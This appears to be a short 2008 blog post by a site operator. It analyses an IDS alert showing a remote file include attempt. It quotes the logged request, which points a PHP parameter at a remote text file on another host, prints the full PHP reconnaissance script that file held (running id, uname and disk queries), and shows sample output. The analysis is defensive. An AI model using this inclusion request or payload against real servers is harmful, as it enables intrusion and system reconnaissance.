MrNeti Tries to Enter the House
This was an interesting one: I just ran across this alert from my IDS:
66.216.91.89 - - [30/Jul/2008:04:32:54 -0400] "GET /node//e404.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 4252
It seems someone is trying to read in an arbitrary file as part of a script execution. Tracking down the file I found it contained the following code:
<?php function ConvertBytes($number) { $len = strlen($number); if($len < 4) { return sprintf("%d b", $number); } if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); } if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); } return sprintf("%0.2f Gb", $number/1024/1024/1024); } echo "MrNETi<br>"; $un = @php_uname(); $id1 = system(id); $pwd1 = @getcwd(); $free1= diskfreespace($pwd1); $free = ConvertBytes(diskfreespace($pwd1)); if (!$free) {$free = 0;} $all1= disk_total_space($pwd1); $all = ConvertBytes(disk_total_space($pwd1)); if (!$all) {$all = 0;} $used = ConvertBytes($all1-$free1); $os = @PHP_OS; echo "MrNETi<br>"; echo "uname -a: $un<br>"; echo "os: $os<br>"; echo "id: $id1<br>"; echo "free: $free<br>"; echo "used: $used<br>"; echo "total: $all<br>"; exit;
Now, it this code were to execute (on my Linux VMware image) it would produce the following output:
MrNETi uid=74(apache) gid=74(apache) groups=74(apache) MrNETi uname -a: Linux localhost 2.6.22.12-desktop586-1mdv #1 SMP Tue Nov 20 08:09:17 EST 2007 i686 os: Linux id: uid=74(apache) gid=74(apache) groups=74(apache) free: 3.46 Gb used: 4.22 Gb total: 7.68 Gb
This looks like a pretty basic reconnaissance script. Keep an eye out for it though, it's presence may lead to more nasty attacks. At the very least, if you see this content going over your wire you know a remote file include vulnerability exists and has been exploited.
I did a little checking and couldn't find any known systems that utilize e404.php that could be vulnerable to a file include attack, but I'm sure one is out there if folks are searching for it.